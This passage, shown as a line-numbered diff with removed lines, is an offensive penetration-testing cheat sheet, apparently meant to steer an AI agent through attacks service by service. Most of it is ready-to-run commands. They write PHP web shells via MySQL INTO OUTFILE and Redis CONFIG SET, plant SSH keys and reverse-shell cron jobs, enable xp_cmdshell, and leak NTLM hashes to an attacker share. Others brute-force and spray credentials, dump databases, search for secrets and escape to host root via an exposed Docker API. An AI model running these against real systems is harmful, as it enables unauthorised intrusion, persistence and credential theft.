├── Vulnerabilities:
|
|
112
|
-
│ ├── EternalBlue (MS17-010): nmap -Pn --script smb-vuln-ms17-010
|
|
113
|
-
│ ├── PrintNightmare: web_search("printnightmare exploit")
|
|
114
|
-
│ ├── SMB relay: Responder + ntlmrelayx
|
|
115
|
-
│ └── web_search("SMB {version} CVE exploit")
|
|
116
|
-
├── Password spray: crackmapexec smb TARGET -u users.txt -p passwords.txt
|
|
117
|
-
└── Enum: crackmapexec smb TARGET -u user -p pass --users --groups --loggedon-users
|
|
118
|
-
|
|
119
|
-
NFS (2049):
|
|
120
|
-
├── Show exports: showmount -e TARGET
|
|
121
|
-
├── Mount: mount -t nfs TARGET:/share /mnt/nfs
|
|
122
|
-
├── Check no_root_squash → create SUID binary on share → execute on target
|
|
123
|
-
└── web_search("NFS exploitation no_root_squash")
|
|
124
|
-
|
|
125
|
-
Rsync (873):
|
|
126
|
-
├── List modules: rsync -av --list-only rsync://TARGET/
|
|
127
|
-
├── Download: rsync -av rsync://TARGET/share/ ./loot/
|
|
128
|
-
└── If writable: upload malicious crontab/authorized_keys
|
|
129
|
-
```
|
|
130
|
-
|
|
131
|
-
## Database Services
|
|
132
|
-
|
|
133
|
-
```
|
|
134
|
-
MySQL (3306):
|
|
135
|
-
├── mysql -h TARGET -u root (no password)
|
|
136
|
-
├── mysql -h TARGET -u root -p'root' (common passwords)
|
|
137
|
-
├── Brute force: hydra -l root -P wordlist mysql://TARGET
|
|
138
|
-
├── UDF: web_search("mysql UDF privilege escalation")
|
|
139
|
-
├── INTO OUTFILE: SELECT '<?php system($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/cmd.php'
|
|
140
|
-
├── LOAD_FILE: SELECT LOAD_FILE('/etc/passwd')
|
|
141
|
-
└── web_search("mysql {version} CVE exploit")
|
|
142
|
-
|
|
143
|
-
PostgreSQL (5432):
|
|
144
|
-
├── psql -h TARGET -U postgres (often trust/peer auth)
|
|
145
|
-
├── COPY TO: COPY (SELECT 'shell') TO '/tmp/shell.sh'
|
|
146
|
-
├── pg_read_file: SELECT pg_read_file('/etc/passwd')
|
|
147
|
-
├── Large objects: read/write arbitrary files
|
|
148
|
-
├── Extension: CREATE EXTENSION dblink → SSRF
|
|
149
|
-
└── web_search("postgresql {version} RCE exploit")
|
|
150
|
-
|
|
151
|
-
MSSQL (1433):
|
|
152
|
-
├── impacket-mssqlclient DOMAIN/user:pass@TARGET
|
|
153
|
-
├── xp_cmdshell: EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami'
|
|
154
|
-
├── UNC path: EXEC xp_dirtree '\\ATTACKER\share' → capture NTLMv2
|
|
155
|
-
├── OLE automation: sp_OACreate for command execution
|
|
156
|
-
├── CLR assembly: custom .NET DLL → load and execute
|
|
157
|
-
└── web_search("MSSQL exploitation techniques {year}")
|
|
158
|
-
|
|
159
|
-
Redis (6379):
|
|
160
|
-
├── redis-cli -h TARGET (check no-auth)
|
|
161
|
-
├── INFO → version, OS, memory
|
|
162
|
-
├── Web shell: CONFIG SET dir /var/www/html; CONFIG SET dbfilename shell.php; SET x "<?php system($_GET['cmd']);?>"; SAVE
|
|
163
|
-
├── SSH key: CONFIG SET dir /root/.ssh; CONFIG SET dbfilename authorized_keys; SET x "KEY_DATA"; SAVE
|
|
164
|
-
├── Cron: CONFIG SET dir /var/spool/cron/crontabs; SET x "reverse_shell_cron"; SAVE
|
|
165
|
-
├── Master-slave RCE: MODULE LOAD via replication
|
|
166
|
-
└── web_search("redis {version} RCE exploit")
|
|
167
|
-
|
|
168
|
-
MongoDB (27017):
|
|
169
|
-
├── mongosh mongodb://TARGET:27017 (no auth)
|
|
170
|
-
├── db.adminCommand({listDatabases:1})
|
|
171
|
-
├── Dump all: for each db → show collections → db.collection.find()
|
|
172
|
-
├── Authentication bypass: web_search("mongodb auth bypass")
|
|
173
|
-
└── web_search("mongodb {version} CVE")
|
|
174
|
-
|
|
175
|
-
Elasticsearch (9200):
|
|
176
|
-
├── curl http://TARGET:9200/ → version info
|
|
177
|
-
├── curl http://TARGET:9200/_cat/indices → list all indices
|
|
178
|
-
├── curl http://TARGET:9200/_search?q=password → search for secrets
|
|
179
|
-
├── RCE: web_search("elasticsearch {version} RCE CVE")
|
|
180
|
-
└── Snapshot API → read filesystem
|
|
181
|
-
```
|
|
182
|
-
|
|
183
|
-
## 📧 Other Common Services
|
|
184
|
-
|
|
185
|
-
```
|
|
186
|
-
SMTP (25/587):
|
|
187
|
-
├── User enum: VRFY/EXPN/RCPT TO
|
|
188
|
-
├── Open relay: send from any address
|
|
189
|
-
├── web_search("smtp user enumeration techniques")
|
|
190
|
-
|
|
191
|
-
DNS (53):
|
|
192
|
-
├── Zone transfer: dig axfr @TARGET domain.com
|
|
193
|
-
├── Subdomain brute: fierce, dnsrecon, ffuf
|
|
194
|
-
├── DNS cache snooping: information about internal infrastructure
|
|
195
|
-
└── web_search("DNS exploitation techniques")
|
|
196
|
-
|
|
197
|
-
SNMP (161/162):
|
|
198
|
-
├── snmpwalk -v2c -c public TARGET
|
|
199
|
-
├── Community brute: onesixtyone -c community.txt TARGET
|
|
200
|
-
├── Writable OIDs → RCE: web_search("SNMP RCE write community")
|
|
201
|
-
└── Version 3: credential brute force
|
|
202
|
-
|
|
203
|
-
LDAP (389/636):
|
|
204
|
-
├── Anonymous bind: ldapsearch -x -H ldap://TARGET -s base
|
|
205
|
-
├── User/group enumeration
|
|
206
|
-
├── LDAP injection: see injection.md
|
|
207
|
-
└── Detailed methodology: web_search("LDAP pentesting hacktricks")
|
|
208
|
-
|
|
209
|
-
Docker API (2375/2376):
|
|
210
|
-
├── curl http://TARGET:2375/images/json (if unauthenticated)
|
|
211
|
-
├── Full RCE: docker -H tcp://TARGET:2375 run -v /:/mnt alpine chroot /mnt
|
|
212
|
-
└── Kubernetes: kubectl --server=https://TARGET:6443 get pods
|
|
213
|
-
|
|
214
|
-
Kerberos (88):
|
|
215
|
-
├── User enumeration: kerbrute userenum --dc DC -d DOMAIN users.txt
|
|
216
|
-
├── AS-REP roasting: impacket-GetNPUsers (see ad-attack.md)
|
|
217
|
-
├── Kerberoasting: impacket-GetUserSPNs (see ad-attack.md)
|
|
218
|
-
└── web_search("kerberos attack techniques {year}")
|
|
219
|
-
```
|
|
220
|
-
|
|
221
|
-
## Universal Service Search Pattern
|
|
222
|
-
```
|
|
223
|
-
web_search("{service_name} {version} exploit hacktricks")
|
|
224
|
-
web_search("{service_name} pentesting cheatsheet")
|
|
225
|
-
web_search("{service_name} {version} CVE PoC")
|
|
226
|
-
web_search("{service_name} default credentials")
|
|
227
|
-
web_search("{service_name} security misconfiguration")
|
|
228
|
-
searchsploit {service_name} {version}
|
|
229
|
-
```
|